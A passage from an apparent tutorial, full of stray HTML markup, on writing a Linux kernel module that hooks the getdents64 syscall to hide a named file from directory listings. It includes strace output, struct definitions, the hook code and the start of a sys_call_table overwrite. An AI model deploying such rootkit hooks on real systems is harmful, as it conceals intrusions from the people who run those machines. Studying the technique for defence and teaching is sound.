MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7716000/span/span span class="code-line"span class="go"read(3, quot;nodev\tsysfs\nnodev\trootfs\nnodev\trquot;..., 1024) = 260/span/span span class="code-line"span class="go"read(3, quot;quot;, 1024) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"munmap(0xb7716000, 4096) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/locale-archivequot;, O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/share/locale/locale.aliasquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=2570, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7716000/span/span span class="code-line"span class="go"read(3, quot;# Locale name alias data base.\n#quot;..., 4096) = 2570/span/span span class="code-line"span class="go"read(3, quot;quot;, 4096) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"munmap(0xb7716000, 4096) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_IDENTIFICATIONquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_IDENTIFICATIONquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=366, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 366, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7716000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/i386-linux-gnu/gconv/gconv-modules.cachequot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=26064, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 26064, PROT_READ, MAP_SHARED, 3, 0) = 0xb770f000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"futex(0xb76c2a8c, FUTEX_WAKE_PRIVATE, 2147483647) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_MEASUREMENTquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MEASUREMENTquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=23, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 23, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770e000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_TELEPHONEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_TELEPHONEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=56, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 56, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770d000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_ADDRESSquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_ADDRESSquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=127, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 127, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770c000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_NAMEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_NAMEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=77, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 77, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770b000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_PAPERquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_PAPERquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=34, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 34, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770a000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_MESSAGESquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MESSAGESquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MESSAGES/SYS_LC_MESSAGESquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=52, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 52, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7709000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_MONETARYquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MONETARYquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=290, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 290, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7708000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_COLLATEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_COLLATEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=1170770, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 1170770, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb741f000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_TIMEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_TIMEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=2470, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 2470, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7707000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_NUMERICquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_NUMERICquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=54, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 54, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7706000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_CTYPEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_CTYPEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=256360, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 256360, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb73e0000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0/span/span span class="code-line"span class="go"ioctl(1, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0/span/span span class="code-line"span class="go"open(quot;.quot;, O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY|O_CLOEXEC) = 3/span/span span class="code-line"span class="go"getdents64(3, /* 29 entries */, 32768) = 1024/span/span span class="code-line"span class="go"getdents64(3, /* 0 entries */, 32768) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 1), ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7705000/span/span span class="code-line"span class="go"write(1, quot;hello.c hello.o\t reversquot;..., 71hello.c hello.o reverse_app reverse-app.c reverse.mod.o/span/span span class="code-line"span class="go") = 71/span/span span class="code-line"span class="go"write(1, quot;hello.ko Makefile\t reverquot;..., 67hello.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go") = 67/span/span span class="code-line"span class="go"write(1, quot;hello.mod.c modules.order revquot;..., 77hello.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="go") = 77/span/span span class="code-line"span class="go"write(1, quot;hello.mod.o Module.symvers revquot;..., 79hello.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go") = 79/span/span span class="code-line"span class="go"close(1) = 0/span/span span class="code-line"span class="go"munmap(0xb7705000, 4096) = 0/span/span span class="code-line"span class="go"close(2) = 0/span/span span class="code-line"span class="go"exit_group(0) = ?/span/span span class="code-line"/code/pre/div /td/tr/table pThis gives us lots of information, most of it is useless to us right now so we can use some shell-fu to get rid of it and only display the actual system calls that codels/code is using:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanstrace ls span class="m"1/spangt;/dev/null span class="m"2/spangt;/tmp/ls.stracespan class="p";/span cat /tmp/ls.strace span class="p"|/span cut -dspan class="s1"#39;(#39;/span -f1 span class="p"|/span sort -u/span span class="code-line"span class="go"access/span/span span class="code-line"span class="go"brk/span/span span class="code-line"span class="go"close/span/span span class="code-line"span class="go"execve/span/span span class="code-line"span class="go"exit_group/span/span span class="code-line"span class="go"fstat64/span/span span class="code-line"span class="go"futex/span/span span class="code-line"span class="go"getdents64/span/span span class="code-line"span class="go"getrlimit/span/span span class="code-line"span class="go"ioctl/span/span span class="code-line"span class="go"mmap2/span/span span class="code-line"span class="go"mprotect/span/span span class="code-line"span class="go"munmap/span/span span class="code-line"span class="go"open/span/span span class="code-line"span class="go"read/span/span span class="code-line"span class="go"rt_sigaction/span/span span class="code-line"span class="go"rt_sigprocmask/span/span span class="code-line"span class="go"set_robust_list/span/span span class="code-line"span class="go"set_thread_area/span/span span class="code-line"span class="go"set_tid_address/span/span span class="code-line"span class="go"statfs64/span/span span class="code-line"span class="go"uname/span/span span class="code-line"span class="go"write/span/span span class="code-line"/code/pre/div /td/tr/table pNow we have a decent list of system calls to look at we can use codeman/code to look at what these system calls do./p pAfter you have done that you will notice that codegetdents64/code strongget directory entries/strong is the one we want to look at, here is the prototype shown on the codeman/code page:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="nf"getdents/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe man page also shows the declaration of the codelinux_dirent/code structure:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"d_ino/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* Inode number *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"d_off/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* Offset to next linux_dirent *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"short/spanspan class="w" /spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* Length of this linux_dirent *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"d_name/spanspan class="p"[];/spanspan class="w" /spanspan class="cm"/* Filename (null-terminated) *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="cm"/* length is actually (d_reclen - 2 -/span/span span class="code-line"span class="cm" offsetof(struct linux_dirent, d_name) *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="cm"/*/span/span span class="code-line"span class="cm" char pad; // Zero padding byte/span/span span class="code-line"span class="cm" char d_type; // File type (only since Linux 2.6.4;/span/span span class="code-line"span class="cm" // offset is (d_reclen - 1))/span/span span class="code-line"span class="cm" *//spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis will help us when figuring out how to iterate through the list returned by this syscall./p h2Taking A Closer Look/h2 pIf you want to have a look at how the system call is implemented, you can see where in the kernel it is implemented in code/usr/include/asm-generic/unistd.h/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spangrep -B span class="m"1/span getdents64 /usr/include/asm-generic/unistd.h /span span class="code-line"span class="go"/* fs/readdir.c *//span/span span class="code-line"span class="gp"#/spandefine __NR_getdents64 span class="m"61/span/span span class="code-line"span class="go"__SC_COMP(__NR_getdents64, sys_getdents64, compat_sys_getdents64)/span/span span class="code-line"/code/pre/div /td/tr/table pSo getdents64 is implemented in codefs/readdir.c/code in the kernel source./p pstrongIts worth noting that it might not tell you the relevant source file on the line above, it depends on if there were multiple syscalls implemented in the same file, have a proper look through /usr/include/asm-generic/unistd.h to see what I mean/strong./p pOn my test machine this file is in code/usr/src/linux-source-3.14/fs/readdir.c/code because I have the source package installed:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spangrep getdents64 /usr/src/linux-source-3.14/fs/readdir.c /span span class="code-line"span class="go"SYSCALL_DEFINE3(getdents64, unsigned int, fd,/span/span span class="code-line"span class="go" struct linux_dirent64 __user *, dirent, unsigned int, count)/span/span span class="code-line"/code/pre/div /td/tr/table pWe don't really need to know this for what we want to do but its handy to know if you are going to be kernel hacking./p pOne thing this has shown us is that codegetdents64/code takes the codelinux_dirent64/code struct and not the codelinux_dirent/code struct. After some more grepping we can see that this struct is defined in codeinclude/linux/dirent.h/code as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"u64/spanspan class="w" /spanspan class="n"d_ino/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"s64/spanspan class="w" /spanspan class="n"d_off/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"short/spanspan class="w" /spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"d_type/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"d_name/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis is slightly different to codelinux_dirent/code and this means we will have to include codelinux/dirent.h/code in our LKM./p pIf we look at the number of entries that was returned to codels/code, we can see that it is the exact number of files in the current directory:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanstrace ls span class="m"2/spangt;span class="p"amp;/spanspan class="m"1/span span class="p"|/span grep getdents64/span span class="code-line"span class="go"getdents64(3, /* 29 entries */, 32768) = 1024/span/span span class="code-line"span class="go"getdents64(3, /* 0 entries */, 32768) = 0/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -la span class="p"|/span wc -l/span span class="code-line"span class="go"30/span/span span class="code-line"/code/pre/div /td/tr/table pThere is 1 more in the codels -la/code because of the strongtotal/strong line at the top./p pUsing all of the information we have gathered we can create our hook function:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"asmlinkage/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"sys_getdents64_hook/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"dirp/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"original_getdents64/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="n"rtn/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"strncmp/spanspan class="p"(/spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_name/spanspan class="p",/spanspan class="w" /spanspan class="n"FILE_NAME/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"FILE_NAME/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"reclen/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"next_rec/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="n"cur/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"len/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"next_rec/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memmove/spanspan class="p"(/spanspan class="n"cur/spanspan class="p",/spanspan class="w" /spanspan class="n"next_rec/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-=/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"continue/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent/spanspan class="o"*/spanspan class="p")/spanspan class="w" /spanspan class="p"((/spanspan class="kt"char/spanspan class="o"*/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"i/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pHere we just run the actual system call, loop through the struct that is returned, searching each filename (codelinux_dirent64-gt;d_name/code) with the static constant codeFILE_NAME/code, and if it matches recalculating what is being returned./p h2The sys_call_table/h2 pThe sys_call_table is the table kept by the kernel containing all of the system calls and pointers to where they are in memory./p pWe need to do 2 things regarding this, firstly find the address of the sys_call_table and secondly figure out how to make this table writable (because by default this table is read only)./p pThe first part is pretty easy providing you don't want a portable version. The current kernels codeSystem.map/code file will tell us this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spangrep sys_call_table /boot/System.map-span class="sb"`/spanuname -rspan class="sb"`/span/span span class="code-line"span class="go"c1454100 R sys_call_table/span/span span class="code-line"/code/pre/div /td/tr/table pEasy enough, now to figure out how to make this writable./p pTo do this we need to change the a href="https://en.wikipedia.org/wiki/Page_table" target="_blank"page table/a entry relating to the address where codesys_call_table/code is stored./p pWe can get this entry using the codelookup_address/code function defined in codearch/x86/mm/pageattr.c/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="nf"lookup_address/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"address/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="o"*/spanspan class="n"level/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"__lookup_address_in_pgd/spanspan class="p"(/spanspan class="n"pgd_offset_k/spanspan class="p"(/spanspan class="n"address/spanspan class="p"),/spanspan class="w" /spanspan class="n"address/spanspan class="p",/spanspan class="w" /spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see it returns a pointer to some type of codepte_t/code structure. After a grep through the source again the definition of this structure is in codearch/x86/include/asm/pgtable_64_types.h/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"typedef/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="p"{/spanspan class="w" /spanspan class="n"pteval_t/spanspan class="w" /spanspan class="n"pte/spanspan class="p";/spanspan class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="n"pte_t/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis just contains 1 member (codepteval_t pte/code), luckily the definition of codepteval_t/code is in the same file:/p table class="highlighttable"trtd class="linenos"div 